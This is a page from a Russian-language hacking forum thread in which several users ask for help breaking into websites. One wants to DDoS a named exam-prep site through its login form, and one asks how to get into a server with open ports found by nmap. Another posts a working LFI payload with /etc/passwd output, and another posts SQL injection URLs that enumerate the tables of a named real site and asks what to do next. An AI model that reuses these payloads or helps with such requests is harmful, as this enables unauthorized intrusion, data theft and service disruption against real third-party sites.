 |
|
13.02.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
dix2m, это не инъекция, а обыкновенный запрос к базе. Куда вводить зависит от того, как тебе удобнее юзать базу. Если есть phpmyadmin, то там есть возможность выполнения запросов к базе (кури документацию).
Если его нету, кури документацию к своей СУБД и ищи, где у неё интерфейс. Не графический, естественно приложение в режиме командной строки. Этому приложению и скармливай запрос через командную строку (или терминал, чё у тебя там =))
|
|
|
15.02.2011, 01:00
|
|
Новичок
Регистрация: 10.02.2011
Сообщений: 2
С нами:
8027606
Репутация:
0
|
|
M@ZAX@KEP Спасибо...
А как найди СУБД? В интернете искал, ничего стоещего не нашел.
|
|
|
|
16.02.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
dix2m, ну если ты спрашиваешь, куда отдавать запросы, я думал что она у тебя установлена)) Самый простой способ - установить Denwer. В комплекте с веб-сервером на localhoste получишь и СУБД (MySQL) и phpmyadmin.
|
|
|
|
16.02.2011, 01:00
|
|
Angel of Darkness
Регистрация: 26.09.2008
Сообщений: 548
С нами:
9275426
Репутация:
657
|
|
Прив ,люди подскажите ли...
У меня есть сайт uztest.ru ...у нас там задают подготовку к ЕГЭ..))
На сайте нет уязвимостей (я лично не нашол всё облазил)
Но я думаю можно заддосить сайт,самое уязвимое место для ддоса помоему окно авторизации
Так как там нет капчи...Помогите ,мне нужен запрос,к примеру если вводишь в адресную строку вводился логин и пароль и человек на сайте авторизовывался..)
Вот поля и кнопки которые надо задействовать:
login
password
submit
|
|
|
|
17.02.2011, 01:00
|
|
Новичок
Регистрация: 06.12.2010
Сообщений: 1
С нами:
8122646
Репутация:
0
|
|
доброго времени суток.обьясню кратко я просканил nmap'ом ip адрес и у него открыты несколько портов 25 443 3306 как можно получить доступ на этот сервер подробность не обязательна
|
|
|
|
24.02.2011, 01:00
|
|
Banned
Регистрация: 02.01.2009
Сообщений: 29
С нами:
9133839
Репутация:
85
|
|
Проблем с LFI наковырял site.ru/?page=../../../../../etc/passwd%00 выдает root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon и т.д что с этим можно сделать?
|
|
|
|
24.02.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
|
|
|
|
24.02.2011, 01:00
|
|
Новичок
Регистрация: 23.08.2010
Сообщений: 1
С нами:
8273846
Репутация:
0
|
|
у меня такая проблема...
сайт sql 5 версия движка
code:
http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,version%28 %29,7,8--
http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,table_name ,7,8+from+information_schema.tables--
http://www.idartistes.com/fiche.php?cat=95+union+select+1,2,3,4,5,group_conc at%28column_name%29,7,8+from+information_schema.co lumns+where+table_name=0x4350555f55534552--
что делать дальше?....
ответ если можно то пошаговый, чтобы просто понять а лучше видео(если не лень) |
|
|
|
25.02.2011, 01:00
|
|
Новичок
Регистрация: 23.08.2010
Сообщений: 1
С нами:
8273846
Репутация:
0
|
|
ты видимо не понял... я не знаю какую колонку взять?
|
|
|
|
25.02.2011, 01:00
|
|
Banned
Регистрация: 02.01.2009
Сообщений: 29
С нами:
9133839
Репутация:
85
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [ANGEL]](/avatars/avatar65948.jpg?34858706){kind=avatar}
Линейный вид
